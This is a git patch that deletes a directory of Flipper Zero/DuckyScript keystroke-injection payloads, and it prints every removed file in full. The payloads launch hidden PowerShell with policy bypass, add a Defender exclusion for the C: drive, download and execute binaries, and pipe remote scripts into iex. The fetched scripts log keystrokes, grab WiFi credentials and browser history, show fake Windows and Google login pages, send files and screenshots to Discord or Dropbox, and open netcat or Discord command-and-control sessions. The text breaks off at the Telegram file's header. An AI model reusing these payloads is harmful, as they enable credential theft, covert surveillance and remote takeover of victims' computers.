From c2549dc60eed794dc1f053d1a5b5d2c435b4a412 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 29 Dec 2023 15:21:40 +0000 Subject: [PATCH] Delete Fast-Execution-Scripts directory --- .../Add-Defender-Exclusion.txt | 22 --------------- .../Browser-History-to-Discord.txt | 19 ------------- .../Computer-ACID-Prank.txt | 16 ----------- .../Desktop Screenshare over Netcat.txt | 20 ------------- .../Desktop-Shortcut-Spam.txt | 16 ----------- Fast-Execution-Scripts/Discord C2 Client.txt | 28 ------------------- Fast-Execution-Scripts/Discord-Image-spam.txt | 19 ------------- .../Discord-WiFi-Grabber.txt | 19 ------------- Fast-Execution-Scripts/Download-Execute.txt | 22 --------------- Fast-Execution-Scripts/Exfil-to-Dropbox.txt | 20 ------------- .../Fake Windows 10 Logon.txt | 17 ----------- .../Fake Windows 10 Microsoft Logon.txt | 17 ----------- .../Fake Windows 11 Logon.txt | 17 ----------- .../Fake Windows 11 Microsoft Logon.txt | 17 ----------- .../File-Changes-to-Discord.txt | 20 ------------- Fast-Execution-Scripts/Gif-Player.txt | 16 ----------- .../Google-Phishing-to-Discord.txt | 20 ------------- Fast-Execution-Scripts/Http-Fileserver.txt | 19 ------------- Fast-Execution-Scripts/Http-LAN-Rat.txt | 19 ------------- Fast-Execution-Scripts/Keylog-to-Discord.txt | 20 ------------- .../Local-FileServer-for-Exfiltration.txt | 19 ------------- .../Mouse-Activity-to-Discord.txt | 20 ------------- Fast-Execution-Scripts/README.md | 23 --------------- .../Screenshot-to-Dropbox.txt | 20 ------------- .../Screenshots-to-Discord.txt | 20 ------------- .../Simple-Netcat-Client-(admin).txt | 20 ------------- .../Simple-Netcat-Client.txt | 19 ------------- .../Sys-Info-to-Discord.txt | 19 ------------- .../Sys-Info-to-Telegram.txt | 20 ------------- Fast-Execution-Scripts/Telegram C2 Client.txt | 27 ------------------ Fast-Execution-Scripts/US-Keyboard.txt | 19 ------------- .../Wallpaper-Jumpscare.txt | 17 ----------- 32 files changed, 626 deletions(-) delete mode 100644 Fast-Execution-Scripts/Add-Defender-Exclusion.txt delete mode 100644 Fast-Execution-Scripts/Browser-History-to-Discord.txt delete mode 100644 Fast-Execution-Scripts/Computer-ACID-Prank.txt delete mode 100644 Fast-Execution-Scripts/Desktop Screenshare over Netcat.txt delete mode 100644 Fast-Execution-Scripts/Desktop-Shortcut-Spam.txt delete mode 100644 Fast-Execution-Scripts/Discord C2 Client.txt delete mode 100644 Fast-Execution-Scripts/Discord-Image-spam.txt delete mode 100644 Fast-Execution-Scripts/Discord-WiFi-Grabber.txt delete mode 100644 Fast-Execution-Scripts/Download-Execute.txt delete mode 100644 Fast-Execution-Scripts/Exfil-to-Dropbox.txt delete mode 100644 Fast-Execution-Scripts/Fake Windows 10 Logon.txt delete mode 100644 Fast-Execution-Scripts/Fake Windows 10 Microsoft Logon.txt delete mode 100644 Fast-Execution-Scripts/Fake Windows 11 Logon.txt delete mode 100644 Fast-Execution-Scripts/Fake Windows 11 Microsoft Logon.txt delete mode 100644 Fast-Execution-Scripts/File-Changes-to-Discord.txt delete mode 100644 Fast-Execution-Scripts/Gif-Player.txt delete mode 100644 Fast-Execution-Scripts/Google-Phishing-to-Discord.txt delete mode 100644 Fast-Execution-Scripts/Http-Fileserver.txt delete mode 100644 Fast-Execution-Scripts/Http-LAN-Rat.txt delete mode 100644 Fast-Execution-Scripts/Keylog-to-Discord.txt delete mode 100644 Fast-Execution-Scripts/Local-FileServer-for-Exfiltration.txt delete mode 100644 Fast-Execution-Scripts/Mouse-Activity-to-Discord.txt delete mode 100644 Fast-Execution-Scripts/README.md delete mode 100644 Fast-Execution-Scripts/Screenshot-to-Dropbox.txt delete mode 100644 Fast-Execution-Scripts/Screenshots-to-Discord.txt delete mode 100644 Fast-Execution-Scripts/Simple-Netcat-Client-(admin).txt delete mode 100644 Fast-Execution-Scripts/Simple-Netcat-Client.txt delete mode 100644 Fast-Execution-Scripts/Sys-Info-to-Discord.txt delete mode 100644 Fast-Execution-Scripts/Sys-Info-to-Telegram.txt delete mode 100644 Fast-Execution-Scripts/Telegram C2 Client.txt delete mode 100644 Fast-Execution-Scripts/US-Keyboard.txt delete mode 100644 Fast-Execution-Scripts/Wallpaper-Jumpscare.txt diff --git a/Fast-Execution-Scripts/Add-Defender-Exclusion.txt b/Fast-Execution-Scripts/Add-Defender-Exclusion.txt deleted file mode 100644 index 8a5eb26..0000000 --- a/Fast-Execution-Scripts/Add-Defender-Exclusion.txt +++ /dev/null @@ -1,22 +0,0 @@ -REM Title: Add Windows Defender Exclusion -REM Author: @beigeworm | https://github.com/beigeworm -REM Description: Add Windows Defender Exclusion for C:/ drive. -REM Target: Windows 10 - -REM *SETUP* -REM replace FILE_URL_HERE with the url of your file to run. - -REM some setup for dukie script. -DEFAULT_DELAY 100 - -REM open powershell (remove -W Hidden to show the window). -GUI r -DELAY 750 -STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C Add-MpPreference -ExclusionPath C:/ - -REM replace FILE_URL_HERE below. -STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit - -CTRL-SHIFT ENTER -DELAY 3000 -ALT y diff --git a/Fast-Execution-Scripts/Browser-History-to-Discord.txt b/Fast-Execution-Scripts/Browser-History-to-Discord.txt deleted file mode 100644 index a2a0d3c..0000000 --- a/Fast-Execution-Scripts/Browser-History-to-Discord.txt +++ /dev/null @@ -1,19 +0,0 @@ -REM Title: beigeworm's browser history to Discord Webhook. -REM Author: @beigeworm -REM Description: This script collects browser history and posts results to a discord webhook. -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/brsr-hist.ps1 | iex -ENTER - - diff --git a/Fast-Execution-Scripts/Computer-ACID-Prank.txt b/Fast-Execution-Scripts/Computer-ACID-Prank.txt deleted file mode 100644 index 0a1f873..0000000 --- a/Fast-Execution-Scripts/Computer-ACID-Prank.txt +++ /dev/null @@ -1,16 +0,0 @@ -REM Title: beigeworm's GDI Effects Prank. -REM Author: @beigeworm -REM Description: This script uses GDI effects on the users display to create visual effects for 90 seconds. -REM Target: Windows 10 - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/GDI-haunter.ps1 | iex -ENTER - - diff --git a/Fast-Execution-Scripts/Desktop Screenshare over Netcat.txt b/Fast-Execution-Scripts/Desktop Screenshare over Netcat.txt deleted file mode 100644 index bf78235..0000000 --- a/Fast-Execution-Scripts/Desktop Screenshare over Netcat.txt +++ /dev/null @@ -1,20 +0,0 @@ -REM Title: Beigeworm's Screenshare Through Netcat -REM Author: @beigeworm -REM Description: This script connects target computer with a netcat session to send a stream of the desktop to a browser window. -REM Target: Windows 10 - -REM *SETUP* -REM replace YOUR_IP_HERE with your netcat attacker IP Address. -REM Run script on target Windows system. -REM On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 (Netcat is required) -REM Then in a firefox browser on the Linux box > http://localhost:8080 - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $ip='YOUR_IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Screenshare.ps1 | iex -ENTER diff --git a/Fast-Execution-Scripts/Desktop-Shortcut-Spam.txt b/Fast-Execution-Scripts/Desktop-Shortcut-Spam.txt deleted file mode 100644 index 90ed184..0000000 --- a/Fast-Execution-Scripts/Desktop-Shortcut-Spam.txt +++ /dev/null @@ -1,16 +0,0 @@ -REM Title: beigeworm's Desktop Shortcut Spammer. -REM Author: @beigeworm -REM Description: This script creates 100 shortcuts on the users Desktop. -REM Target: Windows 10 - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Lnk-Spam.ps1 | iex -ENTER - - diff --git a/Fast-Execution-Scripts/Discord C2 Client.txt b/Fast-Execution-Scripts/Discord C2 Client.txt deleted file mode 100644 index 0acd67d..0000000 --- a/Fast-Execution-Scripts/Discord C2 Client.txt +++ /dev/null @@ -1,28 +0,0 @@ - -REM Title: beigeworm's Discord Command And Control. -REM Author: @beigeworm -REM Description: Using a Discord Server Chat and a github text file to Act as a Command and Control Platform. -REM Target: Windows 10 and 11 - -REM SETUP -REM Goto https://pastebin.com and make an account.. -REM Create an empty paste/file and copy the RAW url. -REM Change PASTEBIN_URL_HERE to the RAW url eg. https://pastebin.com/raw/QeCLTdea -OR- http://your.server.ip.here/files/file.txt -REM Change WEBHOOK_HERE to your webhook eg. https://discord.com/api/webhooks/123445623531/f4fw3f4r46r44343t5gxxxxxx - -REM for more info goto - https://github.com/beigeworm/PoshCord-C2 - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -ENTER -DELAY 5000 -STRING $hookurl = 'WEBHOOK_HERE'; $ghurl = 'PASTEBIN_URL_HERE'; -STRING irm https://raw.githubusercontent.com/beigeworm/PoshCord-C2/main/Discord-C2-Client.ps1 | iex -ENTER - diff --git a/Fast-Execution-Scripts/Discord-Image-spam.txt b/Fast-Execution-Scripts/Discord-Image-spam.txt deleted file mode 100644 index 66caf57..0000000 --- a/Fast-Execution-Scripts/Discord-Image-spam.txt +++ /dev/null @@ -1,19 +0,0 @@ - -REM Title: beigeworm's Spam blank image to Discord Webhook. -REM Author: @beigeworm -REM Description: This script sends a blank image to a discord webhook 25 times. -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/DCimg-spam.ps1 | iex -ENTER - diff --git a/Fast-Execution-Scripts/Discord-WiFi-Grabber.txt b/Fast-Execution-Scripts/Discord-WiFi-Grabber.txt deleted file mode 100644 index 96e1644..0000000 --- a/Fast-Execution-Scripts/Discord-WiFi-Grabber.txt +++ /dev/null @@ -1,19 +0,0 @@ -REM Title: beigeworm's saved WiFi to Discord Webhook. -REM Author: @beigeworm -REM Description: This script collects saved WiFi info and posts results to a discord webhook. -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/DC-WiFi-Grab.ps1 | iex -ENTER - - diff --git a/Fast-Execution-Scripts/Download-Execute.txt b/Fast-Execution-Scripts/Download-Execute.txt deleted file mode 100644 index 393ace0..0000000 --- a/Fast-Execution-Scripts/Download-Execute.txt +++ /dev/null @@ -1,22 +0,0 @@ -REM Title: Download-Execute from Run Prompt -REM Author: @beigeworm | https://github.com/beigeworm -REM Description: Uses the Run Prompt to download a file and run it. -REM Target: Windows 10 - -REM *SETUP* -REM replace FILE_URL_HERE with the url of your file to run. - -REM some setup for dukie script. -DEFAULT_DELAY 100 - -REM open powershell (remove -W Hidden to show the window). -GUI r -DELAY 750 -STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:/;Start-Sleep 1; - -REM replace FILE_URL_HERE below. -STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit - -CTRL-SHIFT ENTER -DELAY 3000 -ALT y diff --git a/Fast-Execution-Scripts/Exfil-to-Dropbox.txt b/Fast-Execution-Scripts/Exfil-to-Dropbox.txt deleted file mode 100644 index 0bb4b00..0000000 --- a/Fast-Execution-Scripts/Exfil-to-Dropbox.txt +++ /dev/null @@ -1,20 +0,0 @@ - -REM Title: beigeworm's Exfiltrate files to Dropbox -REM Author: @beigeworm -REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account. -REM Target: Windows 10 - -REM *SETUP* -REM replace DDROPBOX_TOKEN with your Dropbox Token. -REM for setup instructions visit - https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Discord%20Scripts/Exfiltrate%20to%20Dropbox.ps1 - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove -W Hidden to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Exfil-to-Dropbox.ps1 | iex -ENTER - diff --git a/Fast-Execution-Scripts/Fake Windows 10 Logon.txt b/Fast-Execution-Scripts/Fake Windows 10 Logon.txt deleted file mode 100644 index e25f814..0000000 --- a/Fast-Execution-Scripts/Fake Windows 10 Logon.txt +++ /dev/null @@ -1,17 +0,0 @@ -REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook. -REM Author: @beigeworm -REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/WinLogOn10-noac.ps1 | iex -ENTER diff --git a/Fast-Execution-Scripts/Fake Windows 10 Microsoft Logon.txt b/Fast-Execution-Scripts/Fake Windows 10 Microsoft Logon.txt deleted file mode 100644 index e51e758..0000000 --- a/Fast-Execution-Scripts/Fake Windows 10 Microsoft Logon.txt +++ /dev/null @@ -1,17 +0,0 @@ -REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook. -REM Author: @beigeworm -REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/WinLogOn.ps1 | iex -ENTER diff --git a/Fast-Execution-Scripts/Fake Windows 11 Logon.txt b/Fast-Execution-Scripts/Fake Windows 11 Logon.txt deleted file mode 100644 index ec6a9d4..0000000 --- a/Fast-Execution-Scripts/Fake Windows 11 Logon.txt +++ /dev/null @@ -1,17 +0,0 @@ -REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook. -REM Author: @beigeworm -REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/WinLogOn11-noac.ps1 | iex -ENTER diff --git a/Fast-Execution-Scripts/Fake Windows 11 Microsoft Logon.txt b/Fast-Execution-Scripts/Fake Windows 11 Microsoft Logon.txt deleted file mode 100644 index a79d536..0000000 --- a/Fast-Execution-Scripts/Fake Windows 11 Microsoft Logon.txt +++ /dev/null @@ -1,17 +0,0 @@ -REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook. -REM Author: @beigeworm -REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/WinLogOn11.ps1 | iex -ENTER diff --git a/Fast-Execution-Scripts/File-Changes-to-Discord.txt b/Fast-Execution-Scripts/File-Changes-to-Discord.txt deleted file mode 100644 index 17521de..0000000 --- a/Fast-Execution-Scripts/File-Changes-to-Discord.txt +++ /dev/null @@ -1,20 +0,0 @@ - -REM Title: beigeworm's monitor file changes to Discord Webhook. -REM Author: @beigeworm -REM Description: This script monitors any file changes in the USERPROFILE directory and posts results to a discord webhook. -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove -W Hidden to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/FileAC-to-DC.ps1 | iex -ENTER - - diff --git a/Fast-Execution-Scripts/Gif-Player.txt b/Fast-Execution-Scripts/Gif-Player.txt deleted file mode 100644 index fafe158..0000000 --- a/Fast-Execution-Scripts/Gif-Player.txt +++ /dev/null @@ -1,16 +0,0 @@ -REM Title: beigeworm's GIF Player. -REM Author: @beigeworm -REM Description: This script changes downlaods a rick and morty GIF and plays it in a GUI window. -REM Target: Windows 10 - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/GIF-Play.ps1 | iex -ENTER - - diff --git a/Fast-Execution-Scripts/Google-Phishing-to-Discord.txt b/Fast-Execution-Scripts/Google-Phishing-to-Discord.txt deleted file mode 100644 index 528edea..0000000 --- a/Fast-Execution-Scripts/Google-Phishing-to-Discord.txt +++ /dev/null @@ -1,20 +0,0 @@ - -REM Title: beigeworm's Fake Google Phishing page to Discord Webhook. -REM Author: @beigeworm -REM Description: This script makes a Fake Google Phishing page and posts results to a discord webhook. -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove -W Hidden to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Google-Phish.ps1 | iex -ENTER - - diff --git a/Fast-Execution-Scripts/Http-Fileserver.txt b/Fast-Execution-Scripts/Http-Fileserver.txt deleted file mode 100644 index f7672e4..0000000 --- a/Fast-Execution-Scripts/Http-Fileserver.txt +++ /dev/null @@ -1,19 +0,0 @@ -REM Title: beigeworm's HTTP LAN RAT -REM Author: @beigeworm -REM Description: This script hosts a webpage on the machines ip address with powershell commands to execute. -REM ( use ipconfig to find the local ip and type http://:5000/ in a browser ) -REM **MUST BE RUN AS ADMIN** -REM Discord Webhook not required - It will post the machine's local IP to discord. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -w h -NoP -Ep Bypass -C $dc='WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/FolderHost-w-PS.ps1 | iex -CTRL-SHIFT ENTER -DELAY 3000 -ALT y - diff --git a/Fast-Execution-Scripts/Http-LAN-Rat.txt b/Fast-Execution-Scripts/Http-LAN-Rat.txt deleted file mode 100644 index 2ccc5dc..0000000 --- a/Fast-Execution-Scripts/Http-LAN-Rat.txt +++ /dev/null @@ -1,19 +0,0 @@ -REM Title: beigeworm's HTTP LAN RAT -REM Author: @beigeworm -REM Description: This script hosts a webpage on the machines ip address with powershell commands to execute. -REM ( use ipconfig to find the local ip and type http://:5000/ in a browser ) -REM **MUST BE RUN AS ADMIN** -REM Discord Webhook not required - It will post the machine's local IP to discord. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -w h -NoP -Ep Bypass -C $dc='WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/LAN-rat.ps1 | iex -CTRL-SHIFT ENTER -DELAY 3000 -ALT y - diff --git a/Fast-Execution-Scripts/Keylog-to-Discord.txt b/Fast-Execution-Scripts/Keylog-to-Discord.txt deleted file mode 100644 index 9d7d132..0000000 --- a/Fast-Execution-Scripts/Keylog-to-Discord.txt +++ /dev/null @@ -1,20 +0,0 @@ - -REM Title: beigeworm's Keyloggger to Discord Webhook. -REM Author: @beigeworm -REM Description: This script logs all Keystrokes and posts results to a discord webhook when the keyboard goes inactive for more than 10 secs. -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Keylog-to-DC.ps1 | iex -ENTER - - diff --git a/Fast-Execution-Scripts/Local-FileServer-for-Exfiltration.txt b/Fast-Execution-Scripts/Local-FileServer-for-Exfiltration.txt deleted file mode 100644 index ccad015..0000000 --- a/Fast-Execution-Scripts/Local-FileServer-for-Exfiltration.txt +++ /dev/null @@ -1,19 +0,0 @@ -REM Title: beigeworm's USER folder Host. -REM Author: @beigeworm -REM Description: This script hosts the User directory to the machines ip address so another device on the network can browse and exfiltrate files at will. -REM ( use ipconfig to find the local ip and type http://:5000/ in a browser ) -REM **MUST BE RUN AS ADMIN** -REM Discord Webhook not required - It will post the machine's local IP to discord. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -w h -NoP -Ep Bypass -C $dc='WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/FileServer.ps1 | iex -CTRL-SHIFT ENTER -DELAY 3000 -ALT y - diff --git a/Fast-Execution-Scripts/Mouse-Activity-to-Discord.txt b/Fast-Execution-Scripts/Mouse-Activity-to-Discord.txt deleted file mode 100644 index b657968..0000000 --- a/Fast-Execution-Scripts/Mouse-Activity-to-Discord.txt +++ /dev/null @@ -1,20 +0,0 @@ - -REM Title: beigeworm's monitor mouse activity to Discord Webhook. -REM Author: @beigeworm -REM Description: This script monitors mouse activity and posts results to a discord webhook. -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove -W Hidden to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/MouseAC-to-DC.ps1 | iex -ENTER - - diff --git a/Fast-Execution-Scripts/README.md b/Fast-Execution-Scripts/README.md deleted file mode 100644 index 480ae6b..0000000 --- a/Fast-Execution-Scripts/README.md +++ /dev/null @@ -1,23 +0,0 @@ -# Downloadable-Fast-Execution-Scripts-For-FlipperZero - -Easy to setup with tutorials for web hooks etc below... - -They use this cmd > `STRING powershell -NoP -Ep Bypass -W H -C $variable='USER_INPUT_HERE'; irm HOSTED_SCRIPT_URL_HERE | iex` - -These scripts range from harmless pranks to nefarious red team tools. For educational purposes only! - -**If you want to learn more about the code, or modify them, most of these scripts are in powershell format here** - -https://github.com/beigeworm/Powershell-Tools-and-Toys - -# Pre-Deployment Setup -Most of these scripts will require some setup before they will work. - -Setup Instructions are within the payload files. - --------------------------------------------------------------------------------- -**These Scripts Are Pulled From This Repository** - -https://github.com/beigeworm/assets/tree/main/Scripts - -**You Should ALWAYS Read Any Scripts BEFORE running them** diff --git a/Fast-Execution-Scripts/Screenshot-to-Dropbox.txt b/Fast-Execution-Scripts/Screenshot-to-Dropbox.txt deleted file mode 100644 index c80e836..0000000 --- a/Fast-Execution-Scripts/Screenshot-to-Dropbox.txt +++ /dev/null @@ -1,20 +0,0 @@ - -REM Title: beigeworm's Exfiltrate files to Dropbox -REM Author: @beigeworm -REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account. -REM Target: Windows 10 - -REM *SETUP* -REM replace DDROPBOX_TOKEN with your Dropbox Token. -REM for setup instructions visit - https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Discord%20Scripts/Exfiltrate%20to%20Dropbox.ps1 - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove -W Hidden to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/SShot-to-Dropbox.ps1 | iex -ENTER - diff --git a/Fast-Execution-Scripts/Screenshots-to-Discord.txt b/Fast-Execution-Scripts/Screenshots-to-Discord.txt deleted file mode 100644 index 7145000..0000000 --- a/Fast-Execution-Scripts/Screenshots-to-Discord.txt +++ /dev/null @@ -1,20 +0,0 @@ - -REM Title: beigeworm's periodic Screenshots to discord webhook -REM Author: @beigeworm -REM Description: This script takes a screenshot of the deasktop every 5 mins and posts to a discord webhook. -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/SShots-to-DC.ps1 | iex -ENTER - - diff --git a/Fast-Execution-Scripts/Simple-Netcat-Client-(admin).txt b/Fast-Execution-Scripts/Simple-Netcat-Client-(admin).txt deleted file mode 100644 index e7ba28a..0000000 --- a/Fast-Execution-Scripts/Simple-Netcat-Client-(admin).txt +++ /dev/null @@ -1,20 +0,0 @@ - -REM Title: Beigeworm's Simple Netcat Client -REM Author: @beigeworm -REM Description: This script connects target computer with a netcat session to send powershell commands. -REM Target: Windows 10 - -REM *SETUP* -REM replace IP_HERE with your netcat attacker IP Address. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/NC-Client.ps1 | iex -CTRL-SHIFT ENTER -DELAY 3000 -ALT y diff --git a/Fast-Execution-Scripts/Simple-Netcat-Client.txt b/Fast-Execution-Scripts/Simple-Netcat-Client.txt deleted file mode 100644 index 8787938..0000000 --- a/Fast-Execution-Scripts/Simple-Netcat-Client.txt +++ /dev/null @@ -1,19 +0,0 @@ - -REM Title: Beigeworm's Simple Netcat Client -REM Author: @beigeworm -REM Description: This script connects target computer with a netcat session to send powershell commands. -REM Target: Windows 10 - -REM *SETUP* -REM replace IP_HERE with your netcat attacker IP Address. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/NC-Client.ps1 | iex -ENTER - diff --git a/Fast-Execution-Scripts/Sys-Info-to-Discord.txt b/Fast-Execution-Scripts/Sys-Info-to-Discord.txt deleted file mode 100644 index b96dcee..0000000 --- a/Fast-Execution-Scripts/Sys-Info-to-Discord.txt +++ /dev/null @@ -1,19 +0,0 @@ - -REM Title: beigeworm's system information to discord webhook -REM Author: @beigeworm -REM Description: This script gathers system information and posts to a discord webhook address with the results. -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Sys-Info-to-DC.ps1 | iex -ENTER - diff --git a/Fast-Execution-Scripts/Sys-Info-to-Telegram.txt 